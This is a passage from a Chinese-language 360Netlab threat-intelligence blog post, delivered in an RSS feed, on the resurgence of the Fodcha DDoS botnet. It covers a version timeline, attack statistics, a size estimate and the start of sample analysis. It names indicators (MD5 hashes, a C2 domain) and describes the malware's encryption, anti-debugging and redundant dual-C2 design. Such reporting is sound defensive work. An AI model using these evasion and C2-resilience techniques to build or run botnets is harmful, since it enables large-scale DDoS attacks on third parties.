0f781868d4b9203569357b2dbc46ef10
</code></pre>
]]></content:encoded></item><item><title><![CDATA[卷土重来的DDoS狂魔：Fodcha僵尸网络再次露出獠牙]]></title><description><![CDATA[<h1 id="%E8%83%8C%E6%99%AF">&#x80CC;&#x666F;</h1>
<p>2022&#x5E74;4&#x6708;13&#x65E5;&#xFF0C;360Netlab&#x9996;&#x6B21;&#x5411;&#x793E;&#x533A;&#x62AB;&#x9732;&#x4E86;Fodcha&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x5728;&#x6211;&#x4EEC;&#x7684;&#x6587;&#x7AE0;&#x53D1;&#x8868;&#x4E4B;&#x540E;&#xFF0C;Fodcha&#x906D;&#x53D7;&#x5230;&#x76F8;&#x5173;&#x90E8;&#x95E8;&#x7684;&#x6253;&#x51FB;&#xFF0C;&#x5176;&#x4F5C;&#x8005;</p>]]></description><link>https://blog.netlab.360.com/ddosmonster_the_return_of__fodcha_cn/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53023</guid><category><![CDATA[Botnet]]></category><category><![CDATA[DDoS]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Thu, 27 Oct 2022 02:49:26 GMT</pubDate><content:encoded><![CDATA[<h1 id="%E8%83%8C%E6%99%AF">&#x80CC;&#x666F;</h1>
<p>2022&#x5E74;4&#x6708;13&#x65E5;&#xFF0C;360Netlab&#x9996;&#x6B21;&#x5411;&#x793E;&#x533A;&#x62AB;&#x9732;&#x4E86;Fodcha&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x5728;&#x6211;&#x4EEC;&#x7684;&#x6587;&#x7AE0;&#x53D1;&#x8868;&#x4E4B;&#x540E;&#xFF0C;Fodcha&#x906D;&#x53D7;&#x5230;&#x76F8;&#x5173;&#x90E8;&#x95E8;&#x7684;&#x6253;&#x51FB;&#xFF0C;&#x5176;&#x4F5C;&#x8005;&#x8FC5;&#x901F;&#x505A;&#x51FA;&#x56DE;&#x5E94;&#xFF0C;&#x5728;&#x6837;&#x672C;&#x4E2D;&#x7559;&#x4E0B;<code>Netlab pls leave me alone I surrender</code>&#x5B57;&#x6837;&#x5411;&#x6211;&#x4EEC;&#x6295;&#x964D;&#x3002;&#x672C;&#x4EE5;&#x4E3A;Fodcha&#x4F1A;&#x5C31;&#x6B64;&#x6DE1;&#x51FA;&#x6C5F;&#x6E56;&#xFF0C;&#x6CA1;&#x60F3;&#x5230;&#x8FD9;&#x6B21;&#x6295;&#x964D;&#x53EA;&#x662F;&#x4E00;&#x4E2A;<strong>&#x4E0D;&#x8BB2;&#x6B66;&#x5FB7;&#x7684;&#x5047;&#x52A8;&#x4F5C;</strong>&#xFF0C;Fodcha&#x7684;&#x4F5C;&#x8005;&#x5728;&#x8BC8;&#x964D;&#x4E4B;&#x540E;&#x5E76;&#x6CA1;&#x6709;&#x505C;&#x4E0B;&#x66F4;&#x65B0;&#x7684;&#x811A;&#x6B65;&#xFF0C;&#x5F88;&#x5FEB;&#x5C31;&#x63A8;&#x51FA;&#x4E86;&#x65B0;&#x7248;&#x672C;&#x3002;</p>
<p>&#x5728;&#x65B0;&#x7248;&#x672C;&#x4E2D;&#xFF0C;Fodcha&#x7684;&#x4F5C;&#x8005;&#x91CD;&#x65B0;&#x8BBE;&#x8BA1;&#x4E86;&#x901A;&#x4FE1;&#x534F;&#x8BAE;&#xFF0C;&#x5E76;&#x5F00;&#x59CB;&#x4F7F;&#x7528;xxtea&#x548C;chacha20&#x7B97;&#x6CD5;&#x5BF9;&#x654F;&#x611F;&#x8D44;&#x6E90;&#x548C;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x8FDB;&#x884C;&#x52A0;&#x5BC6;&#xFF0C;&#x4EE5;&#x8EB2;&#x907F;&#x6587;&#x4EF6;&amp;&#x6D41;&#x91CF;&#x5C42;&#x9762;&#x7684;&#x68C0;&#x6D4B;&#xFF1B;&#x540C;&#x65F6;&#x5F15;&#x5165;&#x4E86;<strong>OpenNIC &#x57DF;&#x540D;</strong>&#x505A;&#x4E3A;&#x4E3B;&#x9009;C2&#xFF0C;<strong>ICANN &#x57DF;&#x540D;</strong>&#x505A;&#x4E3A;&#x540E;&#x5907;C2&#x7684;&#x53CC;C2&#x65B9;&#x6848;&#x3002;&#x8FD9;&#x79CD;&#x5197;&#x4F59;&#x673A;&#x5236;&#xFF0C;&#x65E2;&#x80FD;&#x9632;&#x6B62;C2&#x88AB;&#x63A5;&#x7BA1;&#xFF0C;&#x53C8;&#x6709;&#x826F;&#x597D;&#x7684;&#x5065;&#x58EE;&#x6027;&#xFF0C;&#x80FD;&#x591F;&#x7EF4;&#x6301;&#x5176;&#x4E3B;&#x63A7;&#x7F51;&#x7EDC;&#x7684;&#x7A33;&#x5B9A;&#x3002;</p>
<p>&#x4F9D;&#x6258;&#x4E8E;&#x80CC;&#x540E;&#x56E2;&#x961F;&#x5F3A;&#x5927;&#x7684;N-day&#x6F0F;&#x6D1E;&#x6574;&#x5408;&#x80FD;&#x529B;&#xFF0C;&#x5377;&#x571F;&#x91CD;&#x6765;&#x7684;Focha&#x4E0E;&#x4E4B;&#x524D;&#x5BF9;&#x6BD4;&#x53EF;&#x8C13;&#x6709;&#x8FC7;&#x4E4B;&#x800C;&#x65E0;&#x4E0D;&#x53CA;&#x3002;&#x5728;&#x6211;&#x4EEC;&#x7684;&#x6570;&#x636E;&#x89C6;&#x91CE;&#x4E2D;&#xFF0C;<strong>&#x4ECE;&#x89C4;&#x6A21;&#x6765;&#x770B;</strong>&#xFF0C;Fodcha&#x518D;&#x6B21;&#x53D1;&#x5C55;&#x6210;&#x65E5;&#x6D3B;Bot&#x8282;&#x70B9;&#x6570;&#x8D85;&#x8FC7;60K&#xFF0C;C2&#x57DF;&#x540D;&#x7ED1;&#x5B9A;40+IP&#xFF0C;&#x53EF;&#x4EE5;&#x8F7B;&#x677E;&#x6253;&#x51FA;&#x8D85;&#x8FC7;<strong>1Tbps</strong>&#x6D41;&#x91CF;&#x7684;&#x5927;&#x89C4;&#x6A21;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF1B;<strong>&#x5C31;&#x6D3B;&#x8DC3;&#x7A0B;&#x5EA6;&#x800C;&#x8A00;</strong>&#xFF0C;Fodcha&#x65E5;&#x5747;&#x653B;&#x51FB;&#x76EE;&#x6807;100+&#xFF0C;&#x7D2F;&#x8BA1;&#x653B;&#x51FB;&#x76EE;&#x6807;2&#x4E07;&#x591A;&#xFF0C;&#x5728;10&#x6708;11&#x65E5;&#x5230;&#x8FBE;&#x4E86;&#x653B;&#x51FB;&#x7684;&#x5DC5;&#x5CF0;&#xFF0C;&#x5355;&#x65E5;&#x201C;<strong>&#x4E27;&#x5FC3;&#x75C5;&#x72C2;</strong>&#x201D;&#x7684;&#x653B;&#x51FB;&#x4E86;<strong>1396&#x4E2A;&#x76EE;&#x6807;</strong>&#x3002;</p>
<p>&#x5728;&#x6781;&#x77ED;&#x7684;&#x65F6;&#x95F4;&#x5185;&#x91CD;&#x56DE;&#x5DC5;&#x5CF0;&#xFF0C;Fodcha&#x7684;&#x4F5C;&#x8005;&#x4F3C;&#x4E4E;&#x5FD8;&#x4E86;&#x95F7;&#x58F0;&#x53D1;&#x5927;&#x8D22;&#x7684;&#x9053;&#x7406;&#xFF0C;&#x7ADF;&#x7136;&#x53C8;&#x5F00;&#x59CB;&#x4E3B;&#x52A8;&quot;&#x62DB;&#x60F9;&#x201D;&#x6211;&#x4EEC;&#xFF0C;&#x5728;&#x67D0;&#x6B21;&#x626B;&#x63CF;&#x7684;&#x811A;&#x672C;&#x4E2D;&#x4F7F;&#x7528;<code>N3t1@bG@Y</code>&#x5B57;&#x6837;&#x7684;leetspeak&#xFF0C;&#x7FFB;&#x8BD1;&#x8FC7;&#x6765;&#x5C31;&#x662F;&quot;<code>NETLABGAY</code>&quot;&#xFF0C;&#x8FD9;&#x4E48;&#x660E;&#x76EE;&#x5F20;&#x80C6;&#x7684;&#x9ED1;Netlab&#xFF0C;&#x8BA9;&#x6211;&#x4EEC;&#x89C9;&#x5F97;&#x5B83;&#x591A;&#x591A;&#x5C11;&#x5C11;&#x6709;&#x4E9B;&#x201C;&#x76AE;&#x75D2;&#x201D;&#x4E86;&#x3002;</p>
<p>&#x9274;&#x4E8E;Fodcha&#x7684;&#x89C4;&#x6A21;&amp;&#x6D3B;&#x8DC3;&#x7A0B;&#x5EA6;&#x5E26;&#x6765;&#x7684;&#x5DE8;&#x5927;&#x5371;&#x9669;&#x6027;&#xFF0C;&#x4EE5;&#x53CA;&#x975E;&#x5E38;&#x56A3;&#x5F20;&#x7684;&#x6311;&#x8845;&#xFF0C;&#x6211;&#x4EEC;&#x51B3;&#x5B9A;&#x64B0;&#x5199;&#x672C;&#x6587;&#x5411;&#x793E;&#x533A;&#x5206;&#x4EAB;&#x6211;&#x4EEC;&#x7684;&#x53D1;&#x73B0;&#xFF0C;&#x4E00;&#x8D77;&#x6253;&#x51FB;Fodcha&#x7684;&#x56A3;&#x5F20;&#x6C14;&#x7130;&#xFF0C;&#x5171;&#x540C;&#x7EF4;&#x62A4;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x3002;</p>
<h1 id="%E6%97%B6%E9%97%B4%E7%BA%BF">&#x65F6;&#x95F4;&#x7EBF;</h1>
<p>&#x4F9D;&#x6258;&#x4E8E;360Netlab&#x5F3A;&#x5927;&#x7684;BotMon&#x548C;DDoSMon&#x7CFB;&#x7EDF;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9;Fodcha&#x7684;&#x6837;&#x672C;&#x6F14;&#x53D8;&#x548C;DDoS&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x4E00;&#x76F4;&#x4FDD;&#x6301;&#x7740;&#x826F;&#x597D;&#x8DDF;&#x8E2A;&#xFF0C;&#x4E0B;&#x9762;&#x662F;&#x6211;&#x4EEC;&#x770B;&#x5230;&#x7684;&#x6837;&#x672C;&#x6F14;&#x53D8;&#x4EE5;&#x53CA;&#x4E00;&#x4E9B;&#x91CD;&#x8981;&#x7684;DDoS&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x3002;&#xFF08;&#x6CE8;&#xFF1A;Fodcha&#x6837;&#x672C;&#x672C;&#x8EAB;&#x6CA1;&#x6709;&#x7279;&#x5B9A;&#x7684;&#x6807;&#x5FD7;&#x8868;&#x660E;&#x5176;&#x7248;&#x672C;&#xFF0C;&#x8FD9;&#x662F;&#x6211;&#x4EEC;&#x5185;&#x90E8;&#x4E3A;&#x4E86;&#x8DDF;&#x8E2A;&#x65B9;&#x4FBF;&#x800C;&#x5B9A;&#x7684;&#x7248;&#x672C;&#x53F7;&#xFF09;</p>
<ul>
<li>
<p>2022&#x5E74;1&#x6708;12&#x65E5;&#xFF0C;&#x9996;&#x6B21;&#x6355;&#x83B7;&#x5230;Fodcha&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x6837;&#x672C;&#x3002;</p>
</li>
<li>
<p>2022&#x5E74;4&#x6708;13&#x65E5;&#xFF0C;&#x9996;&#x6B21;&#x5411;&#x5916;&#x62AB;&#x9732;Fodcha&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x5305;&#x542B;&#x7248;&#x672C;V1&#xFF0C;V2&#x3002;</p>
</li>
<li>
<p>2022&#x5E74;4&#x6708;19&#x65E5;&#xFF0C;&#x6355;&#x83B7;&#x7248;&#x672C;V2.x&#xFF0C;&#x4F7F;&#x7528;<strong>OpenNIC&apos;s TLDs&#x98CE;&#x683C;&#x7684;C2</strong>&#xFF08;&#x5168;&#x6587;&#x7B80;&#x79F0;OpenNIC C2&#xFF09;&#x3002;</p>
</li>
<li>
<p>2022&#x5E74;4&#x6708;24&#x65E5;&#xFF0C;&#x6355;&#x83B7;&#x7248;&#x672C;V3&#xFF0C;&#x4F7F;&#x7528;xxtea&#x7B97;&#x6CD5;&#x52A0;&#x5BC6;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x65B0;&#x589E;<strong>ICANN&apos;s TLDs&#x98CE;&#x683C;&#x7684;C2</strong>&#xFF08;&#x5168;&#x6587;&#x7B80;&#x79F0;ICANN C2&#xFF09;&#xFF0C;&#x548C;OpenNIC C2&#x6784;&#x6210;&#x5197;&#x4F59;&#x673A;&#x5236;&#xFF1B;&#x65B0;&#x589E;&#x53CD;&#x6C99;&#x7BB1;&amp;&#x53CD;&#x8C03;&#x8BD5;&#x673A;&#x5236;&#x3002;</p>
</li>
<li>
<p>2022&#x5E74;6&#x6708;5&#x65E5;&#xFF0C;&#x6355;&#x83B7;&#x7248;&#x672C;V4&#xFF0C;&#x4F7F;&#x7528;&#x7ED3;&#x6784;&#x5316;&#x7684;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x53BB;&#x9664;&#x53CD;&#x6C99;&#x7BB1;&amp;&#x53CD;&#x8C03;&#x8BD5;&#x673A;&#x5236;&#x3002;</p>
</li>
<li>
<p>2022&#x5E74;6&#x6708;7&amp;8&#x65E5;&#xFF0C;&#x76D1;&#x63A7;&#x5230;Fodcha&#x5BF9;<strong>&#x67D0;&#x56FD;&#x7684;&#x67D0;&#x5730;&#x7684;&#x5065;&#x5EB7;&#x7801;&#x673A;&#x6784;</strong>&#x8FDB;&#x884C;&#x4E86;DDoS&#x653B;&#x51FB;&#x3002;</p>
</li>
<li>
<p>2022&#x5E74;7&#x6708;7&#x65E5;&#xFF0C;&#x6355;&#x83B7;&#x7248;&#x672C;V4.x&#xFF0C;&#x989D;&#x5916;&#x65B0;&#x589E;&#x4E00;&#x7EC4;ICANN C2&#x3002;</p>
</li>
<li>
<p>2022&#x5E74;9&#x6708;X&#x65E5;&#xFF0C;&#x5728;&#x534F;&#x52A9;<strong>&#x67D0;&#x56FD;&#x7684;&#x67D0;&#x6267;&#x6CD5;&#x673A;&#x6784;</strong>&#x56FA;&#x5B9A;&#x67D0;&#x516C;&#x53F8;&#x8BED;&#x97F3;&#x4E1A;&#x52A1;&#x88AB;DDoS&#x653B;&#x51FB;&#x7684;&#x8BC1;&#x636E;&#x94FE;&#x8FC7;&#x7A0B;&#x4E2D;&#xFF0C;&#x53D1;&#x73B0;&#x653B;&#x51FB;&#x80CC;&#x540E;&#x6709;Fodcha&#x7684;&#x5F71;&#x5B50;&#x3002;</p>
</li>
<li>
<p>2022&#x5E74;9&#x6708;21&#x65E5;&#xFF0C;<strong>&#x67D0;&#x77E5;&#x540D;&#x4E91;&#x670D;&#x52A1;&#x5546;</strong>&#x5C31;&#x4E00;&#x8D77;&#x6D41;&#x91CF;<strong>&#x8D85;&#x8FC7;1Tbps</strong>&#x7684;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x5411;&#x6211;&#x4EEC;&#x54A8;&#x8BE2;&#xFF0C;&#x7ECF;&#x8FC7;&#x6570;&#x636E;&#x7684;&#x4EA4;&#x53C9;&#x6BD4;&#x5BF9;&#xFF0C;&#x786E;&#x5B9A;&#x653B;&#x51FB;&#x65B9;&#x4E3A;Fodcha&#x3002;</p>
</li>
</ul>
<h1 id="%E8%A7%84%E6%A8%A1%E6%8E%A8%E6%B5%8B">&#x89C4;&#x6A21;&#x63A8;&#x6D4B;</h1>
<p>&#x56FD;&#x5916;&#x5408;&#x4F5C;&#x4F19;&#x4F34;&#x7684;&#x6570;&#x636E;&#x8868;&#x660E;Fodcha 4&#x6708;&#x4EFD;&#x65F6;&#x5168;&#x7403;&#x65E5;&#x6D3B;Bot&#x7684;&#x6570;&#x91CF;&#x4E3A;6W(<a href="https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/">&#x53C2;&#x8003;&#x6211;&#x4EEC;&#x53E6;&#x4E00;&#x7BC7;&#x6587;&#x7AE0;</a>)&#xFF0C;&#x5173;&#x4E8E;Fodcha&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x76EE;&#x524D;&#x89C4;&#x6A21;&#xFF0C;&#x6211;&#x4EEC;&#x6CA1;&#x6709;&#x786E;&#x5207;&#x7684;&#x6570;&#x5B57;&#xFF0C;&#x4F46;&#x901A;&#x8FC7;&#x5BF9;&#x6BD4;Fodcha 4&#x6708;&#x548C;10&#x6708;&#x5728;C2 IP&#x6570;&#x91CF;&#x4E0A;&#x7684;&#x5DEE;&#x5F02;&#xFF0C;&#x6211;&#x4EEC;&#x4ECE;&#x6280;&#x672F;&#x4E0A;&#x51FA;&#x53D1;&#xFF0C;&#x6709;&#x4E2A;&#x672A;&#x7ECF;&#x9A8C;&#x8BC1;&#x7684;&#x731C;&#x6D4B;&#xFF1A;&#x76EE;&#x524D;Fodcha&#x7684;&#x65E5;&#x6D3B;Bot&#x6570;&#x91CF;&#x8D85;&#x8FC7;6W&#x3002;</p>
<p>&#x63A8;&#x6D4B;&#x8FC7;&#x7A0B;&#x5982;&#x4E0B;&#xFF1A;<br>
&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x89C4;&#x6A21;&#x4E0E;C2 IP&#x7684;&#x6570;&#x91CF;&#x5B58;&#x5728;&#x4E00;&#x4E2A;&#x6B63;&#x5411;&#x5173;&#x7CFB;&#xFF0C;&#x6700;&#x6734;&#x7D20;&#x7684;&#x89C2;&#x70B9;&#x662F;&#xFF1A;&#x201C;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x89C4;&#x6A21;&#x8D8A;&#x5927;&#xFF0C;&#x6240;&#x9700;&#x8981;&#x7684;C2&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x4E5F;&#x8D8A;&#x591A;&#x201D;&#x3002;&#x5728;4&#x6708;&#x4EFD;&#xFF0C;Fodcha&#x88AB;&#x5904;&#x7F6E;&#x4E4B;&#x524D;&#xFF0C;&#x5176;&#x4F5C;&#x8005;&#x4E3A;&#x7EF4;&#x6301;6W&#x7684;&#x89C4;&#x6A21;&#xFF0C;&#x6295;&#x5165;&#x4E86;10&#x4E2A;C2 IP&#xFF1B;&#x968F;&#x540E;Fodcha&#x5F00;&#x59CB;&#x4E86;&#x81EA;&#x5DF1;&#x7684;&#x590D;&#x6D3B;&#x4E4B;&#x65C5;&#xFF0C;&#x6211;&#x4EEC;&#x89C2;&#x5BDF;&#x5230;&#x4E00;&#x4E2A;&#x73B0;&#x8C61;&#xFF0C;&#x968F;&#x7740;Fodcha&#x7684;&#x590D;&#x82CF;&#xFF0C;&#x5176;C2&#x57DF;&#x540D;&#x5BF9;&#x5E94;&#x7684;IP&#x5728;&#x6301;&#x7EED;&#x589E;&#x52A0;&#x3002;&#x65F6;&#x81F3;&#x4ECA;&#x65E5;&#xFF0C;Fodcha&#x7684;&#x4F5C;&#x8005;&#x6295;&#x5165;&#x4E86;&#x591A;&#x5C11;C2 IP&#x5462;&#xFF1F;&#x4F7F;&#x7528;dig&#x547D;&#x4EE4;&#x67E5;&#x8BE2;&#x6700;&#x65B0;&#x7684;C2&#x57DF;&#x540D;<code>yellowchinks.dyn</code>&#x7684;&#x7ED1;&#x5B9A;IP&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x6570;&#x91CF;&#x662F;44&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2infras.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2infras.png" class="kg-image"></a></p>
<p>&#x53EF;&#x4EE5;&#x8BF4;&#x6211;&#x4EEC;&#x89C1;&#x8BC1;&#x4E86;Fodcha&#x7684;C2 IP&#x4E00;&#x6B65;&#x6B65;&#x4ECE;&#x51E0;&#x4E2A;&#x589E;&#x957F;&#x5230;&#x4ECA;&#x5929;&#x7684;40+&#xFF0C;&#x53EF;&#x80FD;&#x7684;&#x89E3;&#x91CA;&#x662F;&#x4F5C;&#x8005;&#x4EBA;&#x50BB;&#x94B1;&#x591A;&#x65E0;&#x8111;&#x4E0A;&#x8D44;&#x6E90;&#xFF0C;&#x4F46;&#x7ED3;&#x5408;&#x5176;&#x8FC5;&#x731B;&#x7684;&#x4F20;&#x64AD;&#x4EE5;&#x53CA;&#x5386;&#x53F2;&#x4E0A;&#x66FE;&#x770B;&#x5230;&#x7684;&#x4E07;&#x7EA7;&#x89C4;&#x6A21;&#xFF0C;&#x4ED6;&#x4EEC;&#x589E;&#x52A0;C2 IP&#x66F4;&#x53EF;&#x80FD;&#x7684;&#x539F;&#x56E0;&#x662F;&#x56E0;&#x4E3A;&#x5176;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x89C4;&#x6A21;&#x592A;&#x5927;&#xFF0C;&#x9700;&#x8981;&#x6295;&#x5165;&#x66F4;&#x591A;&#x7684;IP&#x8D44;&#x6E90;&#xFF0C;&#x4EE5;&#x4F7F;Bot&#x4E0E;C2&#x4E4B;&#x95F4;&#x5728;&#x6570;&#x91CF;&#x4E0A;&#x6709;&#x4E00;&#x4E2A;&#x5408;&#x7406;&#x6BD4;&#x4F8B;&#xFF0C;&#x8FBE;&#x5230;&#x8D1F;&#x8F7D;&#x5747;&#x8861;&#x3002;</p>
<p>&#x7EFC;&#x4E0A;&#xFF0C;&#x6211;&#x4EEC;&#x4ECE;C2 IP&#x6570;&#x91CF;&#x4E0A;&#x5927;&#x5E45;&#x5EA6;&#x7684;&#x589E;&#x957F;&#xFF0C;&#x63A8;&#x6D4B;&#x76EE;&#x524D;Fodcha&#x7684;&#x89C4;&#x6A21;&#x5927;&#x4E8E;4&#x6708;&#x4EFD;&#xFF0C;&#x65E5;&#x6D3B;Bot&#x6570;&#x91CF;&#x8D85;&#x8FC7;6W&#x3002;&#x5F53;&#x7136;<strong>&#x518D;&#x5408;&#x7406;&#x7684;&#x63A8;&#x6D4B;&#x4E5F;&#x8FD8;&#x662F;&#x5047;&#x8BBE;</strong>&#xFF0C;&#x6B22;&#x8FCE;&#x6709;&#x89C6;&#x91CE;&#x7684;&#x793E;&#x533A;&#x4F19;&#x4F34;<strong>&#x4E0D;&#x541D;&#x6307;&#x6B63;</strong>&#x3002;</p>
<h1 id="ddos%E7%BB%9F%E8%AE%A1">DDoS&#x7EDF;&#x8BA1;</h1>
<p>&#x56DE;&#x5230;C2 IP 44&#x8FD9;&#x4E2A;&#x6570;&#x5B57;&#x672C;&#x8EAB;&#xFF0C;&#x7EB5;&#x7136;&#x6211;&#x4EEC;&#x548C;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;battle&#x591A;&#x5E74;&#x89C1;&#x591A;&#x8BC6;&#x5E7F;&#xFF0C;&#x4F46;&#x8FD9;&#x4E2A;&#x6570;&#x5B57;&#x4F9D;&#x7136;&#x8BA9;&#x6211;&#x4EEC;&#x611F;&#x5230;&#x60CA;&#x8BB6;&#x3002;&#x4E16;&#x4E0A;&#x6CA1;&#x6709;&#x65E0;&#x7F18;&#x6545;&#x7684;&#x7231;&#xFF0C;&#x5149;&#x662F;&#x8FD9;&#x4E9B;IP&#x8D44;&#x6E90;&#xFF0C;&#x5C31;&#x5F97;&#x82B1;&#x8D39;&#x4E0D;&#x5C11;&#x7684;&#xFF0C;Fodcha&#x7684;&#x4F5C;&#x8005;&#x4E3A;&#x4EC0;&#x4E48;&#x613F;&#x610F;&#x82B1;&#x8FD9;&#x4E2A;&#x94B1;&#x5462;&#xFF1F;&#x7B54;&#x6848;&#x662F;DDoS&#x653B;&#x51FB;&#x8BA9;&#x4ED6;&#x8D5A;&#x5230;&#x4E86;&#x94B1;&#x3002;&#x6211;&#x4EEC;&#x8282;&#x9009;&#x4E86;2022&#x5E74;6&#x6708;29&#x81F3;&#x4ECA;&#x7684;&#x6570;&#x636E;&#xFF0C;&#x5176;&#x653B;&#x51FB;&#x8D8B;&#x52BF;&#x548C;&#x76EE;&#x6807;&#x533A;&#x57DF;&#x5206;&#x5E03;&#x5982;&#x4E0B;&#xFF1A;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/image--1-.png"><img src="https://blog.netlab.360.com/content/images/2022/10/image.min-1.png" class="kg-image"></a><br>
&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#xFF1A;</p>
<ul>
<li>
<p>&#x65E0;&#x6127;&#x4E8E;DDoS&#x72C2;&#x9B54;&#x7684;&#x79F0;&#x53F7;&#xFF0C;&#x653B;&#x51FB;&#x51E0;&#x4E4E;&#x6CA1;&#x6709;&#x505C;&#x6B47;&#xFF0C;&#x51E0;&#x4E4E;&#x6253;&#x904D;&#x5168;&#x7403;&#xFF0C;&#x65E5;&#x5747;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;1K+&#x3002;</p>
</li>
<li>
<p>&#x4E2D;&#x7F8E;&#x4E24;&#x56FD;&#x989C;&#x8272;&#x8F83;&#x6DF1;&#xFF0C;&#x8BF4;&#x660E;&#x4E24;&#x56FD;&#x7D2F;&#x8BA1;&#x88AB;&#x653B;&#x51FB;&#x76EE;&#x6807;&#x53CA;&#x6B21;&#x6570;&#x8F83;&#x591A;&#xFF0C;&#x7EFC;&#x5408;&#x8003;&#x8651;&#x5230;&#x4E24;&#x56FD;&#x5728;&#x4E92;&#x8054;&#x7F51;&#x4E0A;&#x4E1A;&#x52A1;&#x7684;&#x6BD4;&#x91CD;&#x539F;&#x672C;&#x5C31;&#x6BD4;&#x8F83;&#x5927;&#xFF0C;&#x8FD9;&#x91CC;&#x7684;&#x201C;&#x770B;&#x8D77;&#x6765;&#x591A;&#x201D;&#x662F;&#x4E00;&#x79CD;&#x6B63;&#x5E38;&#x72B6;&#x51B5;&#x3002;</p>
</li>
</ul>
<p>&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x5728;7&#x5929;&#x5185;&#x7684;&#x65F6;&#x95F4;&#x5206;&#x5E03;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;Fodcha&#x53D1;&#x8D77;&#x7684;DDoS&#x653B;&#x51FB;&#x904D;&#x53CA;<strong>7 * 24</strong>&#x5C0F;&#x65F6;&#xFF0C;&#x6CA1;&#x6709;&#x660E;&#x663E;&#x7684;&#x65F6;&#x533A;&#x6027;&#xFF0C;&#x6211;&#x4EEC;&#x503E;&#x5411;Fodcha&#x662F;&#x4E00;&#x4E2A;&#x5546;&#x4E1A;&#x9A71;&#x52A8;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_instimezone.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_instimezone.png" class="kg-image"></a></p>
<h1 id="%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90">&#x6837;&#x672C;&#x5206;&#x6790;</h1>
<p>&#x6211;&#x4EEC;&#x5C06;&#x6355;&#x83B7;&#x7684;&#x6837;&#x672C;&#x5206;&#x6210;&#x4E86;&#xFF14;&#x4E2A;&#x5927;&#x7248;&#x672C;&#xFF0C;&#x5176;&#x4E2D;&#x5728;&#x4E0A;&#x4E00;&#x7BC7;blog&#x4E2D;&#x5DF2;&#x7ECF;&#x5206;&#x6790;&#x8FC7;V1V2&#xFF0C;&#x6B64;&#x5904;&#x5C31;&#x4E0D;&#x518D;&#x8D58;&#x8FF0;&#x4E86;&#xFF0C;&#x672C;&#x6587;&#x9009;&#x53D6;&#x6700;&#x65B0;&#x7684;V4&#x7CFB;&#x5217;&#x6837;&#x672C;&#x4E3A;&#x4E3B;&#x8981;&#x5206;&#x6790;&#x5BF9;&#x8C61;&#xFF0C;&#x5B83;&#x4EEC;&#x7684;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code>MD5: ea7945724837f019507fd613ba3e1da9
ELF 32-bit LSB executable, ARM, version 1, dynamically linked (uses shared libs), stripped
LIB: uclibc
PACKER: None
version: V4

MD5: 899047ddf6f62f07150837aef0c1ebfb
ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped
Lib: uclibc
Packer: None
Version: V4.X
</code></pre>
<p>Fodcha&#x7684;Bot&#x5728;&#x88AB;&#x4FB5;&#x5165;&#x8BBE;&#x5907;&#x8FD0;&#x884C;&#x65F6;&#xFF0C;&#x9996;&#x5148;&#x4F1A;&#x4ECE;<code>&#x8FD0;&#x884C;&#x53C2;&#x6570;</code>&#xFF0C;<code>&#x7F51;&#x7EDC;&#x7684;&#x8FDE;&#x901A;&#x6027;</code>&#xFF0C;<code>&#x662F;&#x5426;&#x8BBE;&#x7F6E;&#x201C;LD_PRELOAD&#x201D;&#x73AF;&#x5883;&#x53D8;&#x91CF;</code>&#xFF0C;<code>&#x81EA;&#x8EAB;&#x662F;&#x5426;&#x88AB;&#x8C03;&#x8BD5;</code>&#x7B49;&#x65B9;&#x9762;&#x8FDB;&#x884C;&#x68C0;&#x67E5;&#xFF0C;&#x5982;&#x679C;&#x4E0D;&#x6EE1;&#x8DB3;&#x8981;&#x6C42;&#x5C31;&#x76F4;&#x63A5;&#x9000;&#x51FA;&#xFF0C;&#x8FD9;&#x4E9B;&#x68C0;&#x67E5;&#x53EF;&#x4EE5;&#x770B;&#x6210;&#x662F;&#x4E00;&#x79CD;&#x5BF9;&#x901A;&#x8FC7;&#x6A21;&#x62DF;&#x5668;&amp;&#x6C99;&#x7BB1;&#x63D0;&#x53D6;IOC&#x7684;&#x7B80;&#x5355;&#x5BF9;&#x6297;&#x3002;</p>
